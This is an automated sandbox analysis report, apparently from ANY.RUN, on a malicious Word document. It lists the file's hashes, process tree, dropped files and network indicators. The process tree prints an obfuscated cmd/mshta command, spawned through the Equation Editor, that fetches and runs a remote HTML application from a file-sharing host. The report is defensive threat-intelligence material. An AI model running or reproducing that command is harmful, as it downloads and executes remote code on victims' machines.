Field | Value
---|---
File name: | 35675666.doc
Full analysis: | https://app.any.run/tasks/cda260f0-e628-4778-8381-66b939ef3436
Verdict: | Malicious activity
Analysis date: | January 18, 2020, 07:10:45
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: |
Indicators: |
MIME: | application/octet-stream
File info: | data
MD5: | 2A59FBAD0927E8B010E5D5C28DB79122
SHA1: | EC2911DF98516E90A48ED70780BF97033FF8B12C
SHA256: | B4C52841FFCAEC585BF77A526DE7B77C25C0A6C08F605CA51C2BFC2C22AC4504
SSDEEP: | 96:1X3Pe7ImJ1UzOWpXfVohr4cWsui95/K2/oLMn8tKjJLYnjEldSgpQUiFo9vW1yj:dwvaBXfet4/uiUAMv/ldcUi2M0
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2396 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\35675666.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
3832 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe
1792 | cMd /C mS^Ht^a ht^tp^s:^/^/www6.zippyshare.com/v/rIjgm31E/file.html | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE
2140 | mSHta https://www6.zippyshare.com/v/rIjgm31E/file.html | C:\Windows\system32\mshta.exe | | cMd.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
2396 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 0 | 14.0.6024.1000
3832 | admin | Design Science, Inc. | MEDIUM | Microsoft Equation Editor | 0 | 00110900
1792 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2140 | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | 0 | 8.00.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA95A.tmp.cvr | — | — | —
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DB4F20A-CB9D-45BA-B022-F5236614C303}.tmp | — | — | —
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39DCD18-3F71-4C41-BC7C-8C57C01A2BCE}.tmp | — | — | —
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9111696-3096-4CBD-8269-C58B2351DFF5}.tmp | — | — | —
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$675666.doc | pgc | 3E78FF0BD11FF2F2D20FDD3A6A683FC6 | A2E7E813F101127BE09DA973408558313CF96EB572D2D1D4EF8F8C0CB801DE8E
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CF735F48-A03D-4B89-8D0B-9924DF2968F3}.tmp | binary | 8C260D1BB6AA92C548F17F872E49E6D2 | 2A836F0A000947354E90BF48EEB450CDB77BE2543966930900B1012A0C599477
2396 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 2429C3A5695C3A20FD084E1F0DA0E239 | 33F01B60DE8A9BF31B867927E957797FBE2F7D0CBEBEDAE6F92FDE90E0EC87F6
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2140 | mshta.exe | 46.166.139.151:443 | www6.zippyshare.com | NForce Entertainment B.V. | NL | unknown |
Domain | IP | Reputation
---|---|---
www6.zippyshare.com | | unknown